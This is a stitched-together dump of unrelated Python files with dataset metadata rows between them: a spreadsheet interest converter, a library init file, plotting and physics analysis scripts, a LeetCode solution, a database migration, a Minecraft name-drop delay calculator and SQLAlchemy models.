opts, args = getopt.getopt(argv,"hi:o:",["ifile=","ofile="])
except getopt.GetoptError:
print('convertPP.py -i <inputfile> -o <outputfile>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('convertPP.py -i <inputfile> -o <outputfile>')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
inWorkbook = xlrd.open_workbook(inputfile)
inWorksheet = inWorkbook.sheet_by_index(0)
    #alternatively by worksheet name: inWorksheet = inWorkbook.sheet_by_name('Worksheet')
interests = []
concatInterests = []
iRow = 0
while iRow < inWorksheet.nrows:
if inWorksheet.cell(iRow, iColTransactionType).value == transactionType:
if inWorksheet.cell(iRow, iColDescription).value == descriptionType:
#print('p0: ', inWorksheet.cell(iRow,iColDate).value, inWorksheet.cell(iRow,iColTransactionType).value, inWorksheet.cell(iRow,iColAmount).value, inWorksheet.cell(iRow,iColDescription).value)
lastDate = inWorksheet.cell(iRow,iColDate).value
interest = inWorksheet.cell(iRow,iColAmount).value
#print('p1: ', lastDate, interest, iRow)
interests.append([lastDate, interest])
iRow += 1
#print('px: ', interests)
#print(interests[0][0], interests[1][0])
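    # merge consecutive entries that share the same date, summing their interest
    # amounts so the output has one row per repayment date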
iRow = 0
while iRow < len(interests):
lastDate = interests[iRow][0]
interest = interests[iRow][1]
#print('p3: ', lastDate, iRow, len(interests))
if iRow < len(interests) - 1 and interests[iRow + 1][0] == lastDate:
while interests[iRow + 1][0] == lastDate:
#print('p4: ', interests[iRow + 1][0], lastDate)
iRow += 1
interest += interests[iRow][1]
#print('p5: ', iRow, interest)
if iRow >= len(interests) - 1:
break
concatInterests.append([lastDate, outType, interest])
else:
concatInterests.append([lastDate, outType, interest])
        iRow += 1
        if iRow > len(interests) - 1:
            break
with open(outputfile, 'w', newline='') as outFile:
csv_writer = csv.writer(outFile, delimiter=outDelimiter)
csv_writer.writerow(outHeader)
for row in concatInterests:
csv_writer.writerow(localize_floats(row))
if __name__ == "__main__":
main(sys.argv[1:])
| 29.15625
| 198
| 0.649875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 780
| 0.278671
|
49d5fecaf1e79a501de0719400a144c921ff2ac0
| 1,096
|
py
|
Python
|
lib/python3.7/site-packages/vine/__init__.py
|
nguyentranhoan/uit-mobile
|
8546312b01373d94cf00c64f7eacb769e0f4ccce
|
[
"BSD-3-Clause"
] | 13
|
2018-03-28T23:07:01.000Z
|
2022-03-12T06:01:21.000Z
|
newenv/lib/python3.8/site-packages/vine/__init__.py
|
palakshivlani-11/cryptorium
|
eebb78c061007519e527b3d18b8df6bc13679c46
|
[
"Apache-2.0"
] | 13
|
2020-03-24T17:53:51.000Z
|
2022-02-10T20:01:14.000Z
|
newenv/lib/python3.8/site-packages/vine/__init__.py
|
palakshivlani-11/cryptorium
|
eebb78c061007519e527b3d18b8df6bc13679c46
|
[
"Apache-2.0"
] | 5
|
2018-03-28T23:07:05.000Z
|
2021-12-09T19:02:00.000Z
|
"""Promises, promises, promises."""
from __future__ import absolute_import, unicode_literals
import re
from collections import namedtuple
from .abstract import Thenable
from .promises import promise
from .synchronization import barrier
from .funtools import (
maybe_promise, ensure_promise,
ppartial, preplace, starpromise, transform, wrap,
)
__version__ = '1.3.0'
__author__ = 'Ask Solem'
__contact__ = 'ask@celeryproject.org'
__homepage__ = 'http://github.com/celery/vine'
__docformat__ = 'restructuredtext'
# -eof meta-
version_info_t = namedtuple('version_info_t', (
'major', 'minor', 'micro', 'releaselevel', 'serial',
))
# bump version can only search for {current_version}
# so we have to parse the version here.
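# e.g. '1.3.0' -> version_info_t(major=1, minor=3, micro=0, releaselevel='', serial='')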
_temp = re.match(
r'(\d+)\.(\d+).(\d+)(.+)?', __version__).groups()
VERSION = version_info = version_info_t(
int(_temp[0]), int(_temp[1]), int(_temp[2]), _temp[3] or '', '')
del(_temp)
del(re)
__all__ = [
'Thenable', 'promise', 'barrier',
'maybe_promise', 'ensure_promise',
'ppartial', 'preplace', 'starpromise', 'transform', 'wrap',
]
| 26.095238
| 68
| 0.699818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 426
| 0.388686
|
49d6bd8f68e9b38cfe513863c74dbe676a8959d2
| 1,965
|
py
|
Python
|
Ben_Manuscripts/transport/figures/hops_dwells.py
|
shirtsgroup/LLC_Membranes
|
e94694f298909352d7e9d912625314a1e46aa5b6
|
[
"MIT"
] | 4
|
2019-06-18T15:26:49.000Z
|
2021-08-11T18:57:39.000Z
|
Ben_Manuscripts/transport/figures/hops_dwells.py
|
shirtsgroup/LLC_Membranes
|
e94694f298909352d7e9d912625314a1e46aa5b6
|
[
"MIT"
] | 2
|
2019-08-22T20:11:46.000Z
|
2019-08-22T22:35:17.000Z
|
Ben_Manuscripts/transport/figures/hops_dwells.py
|
shirtsgroup/LLC_Membranes
|
e94694f298909352d7e9d912625314a1e46aa5b6
|
[
"MIT"
] | 4
|
2019-07-06T15:41:53.000Z
|
2021-01-27T17:59:13.000Z
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
from LLC_Membranes.timeseries.forecast_ctrw import System
from LLC_Membranes.llclib import file_rw
import names
residues = ["GCL", "SOH"]
wt = 10
path = "/home/bcoscia/Documents/Gromacs/Transport/NaGA3C11"
colors = ['blue', 'red']
opacity = 1
nbins = 25
lw = 2
fig, ax = plt.subplots(1, 2, figsize=(10, 5))
for j, r in enumerate(residues):
obj = file_rw.load_object('%s/%s/%swt/forecast_%s.pl' % (path, r, wt, r))
hops = []
for i in obj.hop_lengths:
hops += i
print(max(hops))
if j == 0:
hop_hist, edges = np.histogram(hops, density=True, bins=nbins)
bounds = [edges[0], edges[-1]]
else:
hop_hist, edges = np.histogram(hops, density=True, bins=np.linspace(bounds[0], bounds[1], nbins + 1))
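    # build a step-style outline of the histogram: every bin edge appears twice in x
    # and the bin heights fill y, so the curve traces the top of each bar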
hop_outline = np.zeros([len(hop_hist)*2 + 2, 2])
hop_outline[::2, 0] = edges
hop_outline[1::2, 0] = edges
hop_outline[1:-1:2, 1] = hop_hist
hop_outline[2:-1:2, 1] = hop_hist
if j == 0:
dwell_hist, edges = np.histogram(obj.dwell_times, density=True, bins=nbins)
bounds_power = [edges[0], edges[-1]]
else:
dwell_hist, edges = np.histogram(obj.dwell_times, density=True, bins=np.linspace(bounds_power[0], bounds_power[1], nbins + 1))
dwell_outline = np.zeros([len(dwell_hist)*2 + 2, 2])
dwell_outline[::2, 0] = edges
dwell_outline[1::2, 0] = edges
dwell_outline[1:-1:2, 1] = dwell_hist
dwell_outline[2:-1:2, 1] = dwell_hist
ax[0].plot(hop_outline[:, 0], hop_outline[:, 1], color=colors[j], alpha=opacity, linewidth=lw)
ax[1].plot(dwell_outline[:, 0], dwell_outline[:, 1], color=colors[j], alpha=opacity, label=names.res_to_name[r], linewidth=lw)
ax[0].tick_params(labelsize=14)
ax[1].tick_params(labelsize=14)
ax[1].legend(fontsize=14)
ax[0].set_ylabel('Frequency', fontsize=14)
ax[0].set_xlabel('Hop Length (nm)', fontsize=14)
ax[1].set_xlabel('Dwell Time (ns)', fontsize=14)
plt.tight_layout()
plt.savefig('dwell_hop_%s.pdf' % '_'.join(residues))
plt.show()
| 32.213115
| 128
| 0.692112
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 187
| 0.095165
|
49d70088af3c73de71bed44ae91ad6608da6929f
| 1,275
|
py
|
Python
|
1450.py
|
sinasiruosnejad/leetcode
|
8fe5a400bc03a5e129835e380ff9fe72af681d8a
|
[
"MIT"
] | null | null | null |
1450.py
|
sinasiruosnejad/leetcode
|
8fe5a400bc03a5e129835e380ff9fe72af681d8a
|
[
"MIT"
] | null | null | null |
1450.py
|
sinasiruosnejad/leetcode
|
8fe5a400bc03a5e129835e380ff9fe72af681d8a
|
[
"MIT"
] | null | null | null |
def string_to_list(string,array):
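    # parse a bracketed integer list typed by the user, e.g. "[1,2,3]", appending each number to array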
x=input(string)
i=1
while x[i]!=']':
if x[i]!=',':
j=i
temp=''
while x[j]!=',':
if x[j]==']':
break
temp+=x[j]
j+=1
i=j
array.append(int(temp))
else:
i+=1
start_time=[]
end_time=[]
query_time=0
students_count=0
string_to_list('start time : ',start_time)
string_to_list('end time : ',end_time)
query_time=int(input('query time : '))
if not(1<=len(start_time)<=100):
print('start time list out of range')
exit()
elif not(1<=len(end_time)<=100):
print('end time list out of range')
exit()
elif len(start_time)!=len(end_time):
print('length of lists start and end are not the same')
exit()
elif not(1<=query_time<=1000):
print('query time out of range')
exit()
for i in range(len(start_time)):
if not(1<=start_time[i]<=1000):
print(f'start time [{i}] out of range')
exit()
elif not(1<=end_time[i]<=1000):
print(f'end time [{i}] out of range')
exit()
    # a student is counted if they were still doing homework at query_time
    if start_time[i]<=query_time<=end_time[i]:
        students_count+=1
print(students_count)
| 24.519231
| 59
| 0.542745
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 250
| 0.196078
|
49d77fe266bda3b95de391977fa5e234a79bc1d6
| 3,000
|
py
|
Python
|
backend/model/migrate/versions/4dbaa3104f4_.py
|
deti/boss
|
bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869
|
[
"Apache-2.0"
] | 7
|
2018-05-20T08:56:08.000Z
|
2022-03-11T15:50:54.000Z
|
backend/model/migrate/versions/4dbaa3104f4_.py
|
deti/boss
|
bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869
|
[
"Apache-2.0"
] | 2
|
2021-06-08T21:12:51.000Z
|
2022-01-13T01:25:27.000Z
|
backend/model/migrate/versions/4dbaa3104f4_.py
|
deti/boss
|
bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869
|
[
"Apache-2.0"
] | 5
|
2016-10-09T14:52:09.000Z
|
2020-12-25T01:04:35.000Z
|
"""Added tariff
Revision ID: 4dbaa3104f4
Revises: 1d6f96d1df
Create Date: 2015-05-27 16:00:09.343862
"""
# revision identifiers, used by Alembic.
revision = '4dbaa3104f4'
down_revision = '1d6f96d1df'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_account():
### commands auto generated by Alembic - please adjust! ###
op.create_table('tariff',
sa.Column('tariff_id', sa.Integer(), nullable=False),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('currency', sa.String(length=3), nullable=True),
sa.Column('parent_id', sa.Integer(), nullable=True),
sa.Column('deleted', sa.DateTime(), nullable=True),
sa.Column('created', sa.DateTime(), nullable=True),
sa.Column('modified', sa.DateTime(), nullable=True),
sa.Column('mutable', sa.Boolean(), nullable=True),
sa.ForeignKeyConstraint(['parent_id'], ['tariff.tariff_id'], ),
sa.PrimaryKeyConstraint('tariff_id')
)
op.create_table('service_price',
sa.Column('service_id', sa.String(length=32), nullable=False),
sa.Column('price', sa.DECIMAL(precision=20, scale=6), nullable=True),
sa.Column('tariff_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['tariff_id'], ['tariff.tariff_id'], ),
sa.PrimaryKeyConstraint('service_id', 'tariff_id')
)
op.create_table('tariff_history',
sa.Column('history_id', sa.Integer(), nullable=False),
sa.Column('event', sa.String(length=8), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('tariff_id', sa.Integer(), nullable=True),
sa.Column('customer_id', sa.Integer(), nullable=True),
sa.Column('date', sa.DateTime(), nullable=True),
sa.Column('snapshot', sa.Text(), nullable=True),
sa.ForeignKeyConstraint(['customer_id'], ['customer.customer_id'], ),
sa.ForeignKeyConstraint(['tariff_id'], ['tariff.tariff_id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.user_id'], ),
sa.PrimaryKeyConstraint('history_id')
)
op.create_table('tariff_localization',
sa.Column('language', sa.String(length=2), nullable=False),
sa.Column('parent_id', sa.Integer(), nullable=False),
sa.Column('localized_name', sa.String(length=254), nullable=True),
sa.ForeignKeyConstraint(['parent_id'], ['tariff.tariff_id'], ),
sa.PrimaryKeyConstraint('language', 'parent_id'),
sa.UniqueConstraint('localized_name', 'language', name='uix_tariff_localization')
)
### end Alembic commands ###
def downgrade_account():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('tariff_localization')
op.drop_table('tariff_history')
op.drop_table('service_price')
op.drop_table('tariff')
### end Alembic commands ###
def upgrade_fitter():
pass
def downgrade_fitter():
pass
| 32.967033
| 85
| 0.685667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,000
| 0.333333
|
49da0b5cb2458b175611bedd60d99e1e2e8ba045
| 4,970
|
py
|
Python
|
delay.py
|
MythologicalMC/Delay
|
932902e86e9493fa5d08cdb3857d74a178e7f2bc
|
[
"MIT"
] | null | null | null |
delay.py
|
MythologicalMC/Delay
|
932902e86e9493fa5d08cdb3857d74a178e7f2bc
|
[
"MIT"
] | null | null | null |
delay.py
|
MythologicalMC/Delay
|
932902e86e9493fa5d08cdb3857d74a178e7f2bc
|
[
"MIT"
] | null | null | null |
#imports
import os
import subprocess
from colorama import init,Fore, Back, Style
import asyncio
import urllib.parse
import time
from time import perf_counter
init(convert=True)
#vars
ver = "Beta, Lots of commits going on!"
ping = 0
pings = []
tempping = 0
searches = 0
base = 300
delay = 0
gotQ = ""
dropTime = 0
reqTime = 0
#funcs
def setupPing():
print (Fore.BLUE, end='')
print(" [setup]",end='')
print(Fore.CYAN, end='')
tempping = input( ''' What is your latency when connecting to the Minecraft API?
You can also type "auto" for ping detection! ''')
#See if they want auto ping detection or manual
if (tempping == "auto"):
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
print()
print (Fore.BLUE + " [info]" + Fore.CYAN + " Ping detected was " + Fore.WHITE + str(sum(pings)/5) + Fore.CYAN + " ms, This value will be used as your ping.")
return sum(pings)/5
else:
print()
print (Fore.BLUE + " [info]" + Fore.CYAN + " You entered " + str(tempping) + " as your ping in ms, This value will be used as your ping.")
return tempping
def setupSearches():
print()
print (Fore.BLUE, end='')
print(" [setup]",end='')
print(Fore.CYAN, end='')
sm = 0
sm = input(" How many searches/month does the target name have? ")
return sm
def calc():
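    # rough delay estimate in ms: a fixed base offset plus the measured ping, with an
    # extra searches/50 ms of headroom when the name has 1000+ searches per month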
print()
print(Fore.BLUE + " [calculator]" + Fore.CYAN + " Calculating delay using ping: " + Fore.WHITE + str(ping) + Fore.CYAN + ", and searches: " + Fore.WHITE + str(searches) + Fore.CYAN)
if (int(searches) >= 1000):
print()
print (Fore.BLUE + " [info]" + Fore.CYAN + " Since the amount of searches for the name is over 1000, we will account for server lag by adding some extra ms to your delay.")
searchdiv = int(searches) / 50
possibledelay = base + int(ping) + searchdiv
return possibledelay
else:
possibledelay = base + int(ping)
return possibledelay
def out():
print()
print (Fore.BLUE + " [DELAY]" + Fore.CYAN + " Your approximate delay to use is: " + Fore.WHITE + str(delay) + Fore.CYAN + " ms. This is an estimate, and you should lower or higher it depending on request times." )
print()
print (Fore.BLUE, end='')
print(" [DELAY ADJUST]",end='')
print(Fore.CYAN, end='')
gotQ = input(" Did you get the name? (Y/N) (Caps): ")
if (gotQ == "Y"):
print (Fore.BLUE + " [DELAY ADJUST]" + Fore.CYAN + " Good job! Closing in 3 seconds.")
time.sleep(3)
exit()
if (gotQ == "N"):
print (Fore.BLUE, end='')
print(" [DELAY ADJUST]",end='')
print(Fore.CYAN, end='')
dropTime = input(" Sorry to hear that. What time did the name drop? (Seconds/60) (ex. 23): ")
print (Fore.BLUE, end='')
print(" [DELAY ADJUST]",end='')
print(Fore.CYAN, end='')
reqTime = input(" And what time was your last request at? (Seconds.XXXX/60) (ex. 22.9874): ")
if (int(dropTime) > float(reqTime)):
changeDel = (int(dropTime) - float(reqTime)) * 100
print (Fore.BLUE + " [DELAY ADJUST]" + Fore.CYAN + " You were too early. Try: " + Fore.WHITE + str(delay + changeDel) + Fore.CYAN + " ms instead.")
if (int(dropTime) < float(reqTime)):
changeDel = (float(reqTime) - int(dropTime)) * 100
print (Fore.BLUE + " [DELAY ADJUST]" + Fore.CYAN + " You were too late. Try: " + Fore.WHITE + str(delay - changeDel) + Fore.CYAN + " ms instead.")
else:
print (Fore.RED + " [ERROR]" + Fore.CYAN + " Unknown Error")
time.sleep(3)
exit()
else:
print (Fore.RED + " [ERROR]" + Fore.CYAN + " ENTER Y OR N!")
time.sleep(3)
exit()
#THIS PING CHECK CODE IS FROM kingscratss#3407 on discord!!
async def check(url: str):
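    # estimate latency by timing how long a minimal HTTPS request takes to return its
    # first response byte; sampled five times and averaged by the caller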
async def x():
uri = urllib.parse.urlparse(url)
reader, writer = await asyncio.open_connection(uri.hostname, 443, ssl=True)
writer.write(f"GET {uri.path or '/'} HTTP/1.1\r\nHost:{uri.hostname}\r\n\r\n".encode())
start = perf_counter()
await writer.drain()
await reader.read(1)
end = perf_counter()
return round((end - start) * 1000)
for _ in range(5):
pings.append(await x())
await asyncio.sleep(0.01)
async def main():
await check("https://api.minecraftservices.com/minecraft")
#cool ascii text thing/creds
os.system("cls")
print(Fore.LIGHTBLUE_EX + '''
██████╗ ███████╗██╗ █████╗ ██╗ ██╗
██╔══██╗██╔════╝██║ ██╔══██╗╚██╗ ██╔╝
██║ ██║█████╗ ██║ ███████║ ╚████╔╝
██║ ██║██╔══╝ ██║ ██╔══██║ ╚██╔╝
██████╔╝███████╗███████╗██║ ██║ ██║
╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝
''')
print(Fore.LIGHTBLUE_EX + " By Mythological, Version: " + ver)
print()
print()
#assign vars
ping = setupPing()
searches = setupSearches()
#compute the delay and print the result
delay = calc()
out()
| 37.938931
| 217
| 0.567203
| 0
| 0
| 0
| 0
| 0
| 0
| 597
| 0.111672
| 2,199
| 0.411336
|
49da88047bb20d46e7f9d9dfc0e2238764393527
| 10,360
|
py
|
Python
|
src/calc/parallel/calc_qual.py
|
paytonrodman/athena-analysis
|
f635338122e15c318dfd754d06cc3dbaa42273d2
|
[
"BSD-3-Clause"
] | null | null | null |
src/calc/parallel/calc_qual.py
|
paytonrodman/athena-analysis
|
f635338122e15c318dfd754d06cc3dbaa42273d2
|
[
"BSD-3-Clause"
] | null | null | null |
src/calc/parallel/calc_qual.py
|
paytonrodman/athena-analysis
|
f635338122e15c318dfd754d06cc3dbaa42273d2
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
#
# calc_qual.py
#
# A program to calculate the quality factors and magnetic angle within some defined region
# of an Athena++ disk using MPI
#
# To run:
# mpirun -n [n] python calc_qual.py [options]
# for [n] cores.
#
import numpy as np
import os
import sys
sys.path.insert(0, '/home/per29/rds/rds-accretion-zyNhkonJSR8/athena-analysis/dependencies')
#sys.path.insert(0, '/Users/paytonrodman/athena-sim/athena-analysis/dependencies')
import athena_read
import AAT
import glob
import re
import csv
import scipy.stats as st
import argparse
from math import sqrt
from mpi4py import MPI
def main(**kwargs):
# get number of processors and processor rank
comm = MPI.COMM_WORLD
size = comm.Get_size()
rank = comm.Get_rank()
problem = args.prob_id
#root_dir = "/Users/paytonrodman/athena-sim/"
root_dir = '/home/per29/rds/rds-accretion-zyNhkonJSR8/'
prob_dir = root_dir + problem + '/'
data_dir = prob_dir + 'data/'
runfile_dir = prob_dir + 'runfiles/'
os.chdir(data_dir)
data_input = athena_read.athinput(runfile_dir + 'athinput.' + problem)
x1min = data_input['mesh']['x1min'] # bounds of simulation
x1max = data_input['mesh']['x1max']
x2min = data_input['mesh']['x2min']
x2max = data_input['mesh']['x2max']
if 'refinement3' in data_input:
x1_high_min = data_input['refinement3']['x1min'] # bounds of high resolution region
x1_high_max = data_input['refinement3']['x1max']
x2_high_min = data_input['refinement3']['x2min']
x2_high_max = data_input['refinement3']['x2max']
elif 'refinement2' in data_input:
x1_high_min = data_input['refinement2']['x1min'] # bounds of high resolution region
x1_high_max = data_input['refinement2']['x1max']
x2_high_min = data_input['refinement2']['x2min']
x2_high_max = data_input['refinement2']['x2max']
elif 'refinement1' in data_input:
x1_high_min = data_input['refinement1']['x1min'] # bounds of high resolution region
x1_high_max = data_input['refinement1']['x1max']
x2_high_min = data_input['refinement1']['x2min']
x2_high_max = data_input['refinement1']['x2max']
else:
x1_high_min = x1min
x1_high_max = x1max
x2_high_min = x2min
x2_high_max = x2max
data_init = athena_read.athdf(problem + '.cons.00000.athdf', quantities=['x1v','x2v'])
x1v_init = data_init['x1v'] # r
x2v_init = data_init['x2v'] # theta
if kwargs['r_lower'] is not None:
if not x1min <= kwargs['r_lower'] < x1max:
            sys.exit('Error: Lower r value must be between %d and %d' % (x1min, x1max))
rl = AAT.find_nearest(x1v_init, kwargs['r_lower'])
else:
rl = AAT.find_nearest(x1v_init, x1_high_min)
if kwargs['r_upper'] is not None:
if not x1min <= kwargs['r_upper'] < x1max:
            sys.exit('Error: Upper r value must be between %d and %d' % (x1min, x1max))
ru = AAT.find_nearest(x1v_init, kwargs['r_upper'])
else:
ru = AAT.find_nearest(x1v_init, x1_high_max)
if kwargs['theta_lower'] is not None:
if not x2min <= kwargs['theta_lower'] < x2max:
            sys.exit('Error: Lower theta value must be between %d and %d' % (x2min, x2max))
tl = AAT.find_nearest(x2v_init, kwargs['theta_lower'])
else:
tl = AAT.find_nearest(x2v_init, x2_high_min)
if kwargs['theta_upper'] is not None:
if not x2min <= kwargs['theta_upper'] < x2max:
            sys.exit('Error: Upper theta value must be between %d and %d' % (x2min, x2max))
tu = AAT.find_nearest(x2v_init, kwargs['theta_upper'])
else:
tu = AAT.find_nearest(x2v_init, x2_high_max)
if rl==ru:
ru += 1
if tl==tu:
tu += 1
filename_output = 'qual_with_time_' + str(rl) + '_' + str(ru) + '_' + str(tl) + '_' + str(tu) + '.csv'
# check if data file already exists
csv_time = np.empty(0)
if args.update:
with open(prob_dir + filename_output, 'r', newline='') as f:
csv_reader = csv.reader(f, delimiter='\t')
next(csv_reader, None) # skip header
for row in csv_reader:
csv_time = np.append(csv_time, float(row[0]))
files = glob.glob('./high_res.cons.*.athdf')
times = np.empty(0)
for f in files:
time_sec = re.findall(r'\b\d+\b', f)
if args.update:
if float(time_sec[0]) not in times and float(time_sec[0]) not in csv_time:
times = np.append(times, float(time_sec[0]))
else:
if float(time_sec[0]) not in times:
times = np.append(times, float(time_sec[0]))
if len(times)==0:
sys.exit('No new timesteps to analyse in the given directory. Exiting.')
# distribute files to cores
count = len(times) // size # number of files for each process to analyze
remainder = len(times) % size # extra files if times is not a multiple of size
if rank < remainder: # processes with rank < remainder analyze one extra file
start = rank * (count + 1) # index of first file to analyze
stop = start + count + 1 # index of last file to analyze
else:
start = rank * count + remainder
stop = start + count
local_times = times[start:stop] # get the times to be analyzed by each rank
if rank==0:
if not args.update:
with open(prob_dir + filename_output, 'w', newline='') as f:
writer = csv.writer(f, delimiter='\t')
writer.writerow(["sim_time", "orbit_time", "theta_B", "Q_theta", "Q_phi"])
for t in local_times:
str_t = str(int(t)).zfill(5)
#constants
gamma = 5./3.
GM = 1.
#unpack data
data_prim = athena_read.athdf(problem + '.prim.' + str_t + '.athdf', quantities=['press'])
press = data_prim['press']
data_cons = athena_read.athdf(problem + '.cons.' + str_t + '.athdf', quantities=['x1v','x2v','x3v','x1f','x2f','x3f','dens','mom1','mom2','mom3','Bcc1','Bcc2','Bcc3'])
x1v = data_cons['x1v'] # r
x2v = data_cons['x2v'] # theta
x3v = data_cons['x3v'] # phi
x1f = data_cons['x1f'] # r
x2f = data_cons['x2f'] # theta
x3f = data_cons['x3f'] # phi
dens = data_cons['dens']
mom1 = data_cons['mom1']
mom2 = data_cons['mom2']
mom3 = data_cons['mom3']
Bcc1 = data_cons['Bcc1']
Bcc2 = data_cons['Bcc2']
Bcc3 = data_cons['Bcc3']
Omega_kep = np.empty_like(dens)
# Calculations
dx1f,dx2f,dx3f = AAT.calculate_delta(x1f,x2f,x3f)
del x1f,x2f,x3f
        for ii in range(Omega_kep.shape[0]):
Omega_kep[ii,:,:] = np.sqrt(GM/(x1v**3.)) #Keplerian angular velocity in midplane
Bcc1 = Bcc1[rl:ru,tl:tu,:]
Bcc2 = Bcc2[rl:ru,tl:tu,:]
Bcc3 = Bcc3[rl:ru,tl:tu,:]
dens = dens[rl:ru,tl:tu,:]
mom1 = mom1[rl:ru,tl:tu,:]
mom2 = mom2[rl:ru,tl:tu,:]
mom3 = mom3[rl:ru,tl:tu,:]
press = press[rl:ru,tl:tu,:]
Omega_kep = Omega_kep[rl:ru,tl:tu,:]
tB = (-np.arctan(Bcc1/Bcc3)) * (180./np.pi) #degrees
tB_av = np.average(tB)
w = dens + (gamma/(gamma - 1.))*press
B2 = Bcc1**2. + Bcc2**2. + Bcc3**2.
vA_theta = Bcc2/(np.sqrt(w+B2)) #Alfven velocity of theta component of B
vA_phi = Bcc3/(np.sqrt(w+B2)) #Alfven velocity of phi component of B
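        # fastest-growing MRI wavelength in each direction, 2*pi*sqrt(16/15)*|vA|/Omega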
lambda_MRI_theta = 2.*np.pi*np.sqrt(16./15.)*np.abs(vA_theta)/Omega_kep
lambda_MRI_phi = 2.*np.pi*np.sqrt(16./15.)*np.abs(vA_phi)/Omega_kep
phi,_,r = np.meshgrid(x3v,x2v,x1v, sparse=False, indexing='ij')
dphi,dtheta,_ = np.meshgrid(dx3f,dx2f,dx1f, sparse=False, indexing='ij')
r = r[rl:ru,tl:tu,:]
phi = phi[rl:ru,tl:tu,:]
dphi = dphi[rl:ru,tl:tu,:]
dtheta = dtheta[rl:ru,tl:tu,:]
Q_theta = lambda_MRI_theta/np.sqrt(r*dtheta)
Q_phi = lambda_MRI_phi/np.sqrt(r*np.abs(np.sin(phi))*dphi)
Q_theta = np.array(Q_theta.flatten())
Q_phi = np.array(Q_phi.flatten())
Qt_l,Qt_h = st.t.interval(0.95, len(Q_theta)-1, loc=np.mean(Q_theta), scale=st.sem(Q_theta))
Qt_av = np.mean(Q_theta)
Qp_l,Qp_h = st.t.interval(0.95, len(Q_phi)-1, loc=np.mean(Q_phi), scale=st.sem(Q_phi))
Qp_av = np.mean(Q_phi)
r_ISCO = 6 # location of ISCO in PW potential
T_period = 2.*np.pi*sqrt(r_ISCO)*(r_ISCO - 2.)
sim_t = data_cons['Time']
orbit_t = sim_t/T_period
Qt_all = [Qt_l,Qt_av,Qt_h]
Qp_all = [Qp_l,Qp_av,Qp_h]
with open(prob_dir + filename_output, 'a', newline='') as f:
writer = csv.writer(f, delimiter='\t')
row = [sim_t,orbit_t,tB_av,Qt_all,Qp_all]
writer.writerow(row)
# Execute main function
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Calculate various quality factors from raw simulation data.')
parser.add_argument('prob_id',
help='base name of the data being analysed, e.g. inflow_var or disk_base')
parser.add_argument('-u', '--update',
action="store_true",
help='specify whether the results being analysed are from a restart')
parser.add_argument('-rl', '--r_lower',
type=float,
default=None,
help='value of lower r bound of region being analysed, must be between x1min and x1max (default=5)')
parser.add_argument('-ru', '--r_upper',
type=float,
default=None,
help='value of upper r bound of region being analysed, must be between x1min and x1max (default=100)')
parser.add_argument('-tl', '--theta_lower',
type=float,
default=None,
help='value of lower theta bound of region being analysed, must be between x2min and x2max (default=0.982)')
parser.add_argument('-tu', '--theta_upper',
type=float,
default=None,
help='value of upper theta bound of region being analysed, must be between x2min and x2max (default=2.159)')
args = parser.parse_args()
main(**vars(args))
| 40.948617
| 175
| 0.598359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,075
| 0.296815
|
49db3a1ecbfa19102c7269a3533f50d40a8b3fab
| 4,838
|
py
|
Python
|
config/access/model_base.py
|
torrua/loglan_converter
|
e040825354bd07dda4f44d8dd84c79dc1db405c9
|
[
"MIT"
] | null | null | null |
config/access/model_base.py
|
torrua/loglan_converter
|
e040825354bd07dda4f44d8dd84c79dc1db405c9
|
[
"MIT"
] | null | null | null |
config/access/model_base.py
|
torrua/loglan_converter
|
e040825354bd07dda4f44d8dd84c79dc1db405c9
|
[
"MIT"
] | null | null | null |
from sqlalchemy import Column, String, Integer, Text, Boolean, DateTime
from config.access import Base
from sqlalchemy.ext.declarative import declared_attr
from datetime import datetime
class BaseFunctions:
"""
Base class for common methods
"""
__tablename__ = None
@declared_attr
def import_file_name(cls):
return f"{cls.__tablename__}.txt"
@declared_attr
def export_file_name(cls):
return f"AC_{datetime.now().strftime('%y%m%d%H%M')}_{cls.__tablename__}.txt"
def __init__(self, *initial_data, **kwargs):
"""Constructor"""
for dictionary in initial_data:
for key in dictionary:
setattr(self, key, dictionary[key])
for key in kwargs:
setattr(self, key, kwargs[key])
@classmethod
def export_file_path(cls, export_directory):
return export_directory + cls.export_file_name
def export(self):
pass
class AccessAuthor(Base, BaseFunctions):
"""
Author model
"""
__tablename__ = "Author"
sort_name = "Author"
id = Column(Integer, primary_key=True)
abbreviation = Column(String(64), unique=True, nullable=False)
full_name = Column(String(64))
notes = Column(String(128))
class AccessDefinition(Base, BaseFunctions):
__tablename__ = 'WordDefinition'
sort_name = "Definition"
word_id = Column("WID", Integer)
position = Column("I", Integer, nullable=False)
usage = Column("Usage", String(64))
grammar = Column("Grammar", String(8))
body = Column("Definition", Text, nullable=False)
main = Column("Main", String(8))
case_tags = Column("Tags", String(16))
id = Column("id", Integer, primary_key=True)
class AccessEvent(Base, BaseFunctions):
"""
Event model
"""
__tablename__ = "LexEvent"
sort_name = "Event"
id = Column("EVT", Integer, primary_key=True)
name = Column("Event", String(64), nullable=False)
date = Column("When", String(32), nullable=False)
definition = Column("WhyWhat", Text, nullable=False)
annotation = Column("DictionaryAnnotation", String(16))
suffix = Column("FilenameSuffix", String(16))
class AccessSetting(Base, BaseFunctions):
"""
Setting model
"""
__tablename__ = "Settings"
